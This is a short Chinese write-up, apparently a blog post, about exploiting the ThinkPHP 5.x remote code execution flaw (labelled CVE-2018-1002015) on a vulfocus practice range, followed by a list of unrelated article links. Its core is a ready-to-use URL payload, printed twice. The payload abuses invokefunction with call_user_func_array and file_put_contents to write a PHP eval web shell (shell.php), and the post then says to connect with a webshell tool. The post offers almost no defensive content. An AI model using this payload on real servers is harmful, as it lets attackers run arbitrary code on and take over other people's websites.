vulfocus靶场thinkphp命令执行cve-2018-1002015

thinkPHP 5.0.x版本和5.1.x版本中存在远程代码执行漏洞,该漏洞源于ThinkPHP在获取控制器名时未对用户提交的参数进行严格的过滤。远程攻击者可通过输入‘\’字符的方式调用任意方法利用该漏洞执行代码

开启靶场:

使用工具: thinkphp综合利用工具,

payload :

/?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=shell.php&vars[1][]=<?php%20eval($_GET[cmd]);?>

/?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=shell.php&vars[1][]=<?php%20eval($_GET[cmd]);?>

然后使用webshell工具进行连接即可

相关推荐

最近更新

  1. docker php8.1+nginx base 镜像 dockerfile 配置

    2024-04-22 09:22:05       94 阅读
  2. Could not load dynamic library ‘cudart64_100.dll‘

    2024-04-22 09:22:05       100 阅读
  3. 在Django里面运行非项目文件

    2024-04-22 09:22:05       82 阅读
  4. Python语言-面向对象

    2024-04-22 09:22:05       91 阅读

热门阅读

  1. Android活动之Intent

    2024-04-22 09:22:05       36 阅读
  2. 完全日期(蓝桥杯)

    2024-04-22 09:22:05       34 阅读
  3. k8s和docker的一些学习(一)

    2024-04-22 09:22:05       36 阅读
  4. Dockerfile学习

    2024-04-22 09:22:05       38 阅读
  5. 算法 第46天 动态规划8

    2024-04-22 09:22:05       38 阅读
  6. clickhouse ttl不生效

    2024-04-22 09:22:05       32 阅读
  7. go语言触发浏览器打开网址程序实例

    2024-04-22 09:22:05       31 阅读
  8. 【大语言模型LLM】-大语言模型如何编写Prompt?

    2024-04-22 09:22:05       32 阅读
  9. 12.Ribbon饥饿加载

    2024-04-22 09:22:05       33 阅读
  10. windows使用ssh-copy-id命令的解决方案

    2024-04-22 09:22:05       35 阅读
  11. ORAN每个端点和每个C平面消息的限制

    2024-04-22 09:22:05       39 阅读
  12. Nginx日志

    2024-04-22 09:22:05       36 阅读
  13. centos 7.9 安装 ftp 传输文件

    2024-04-22 09:22:05       38 阅读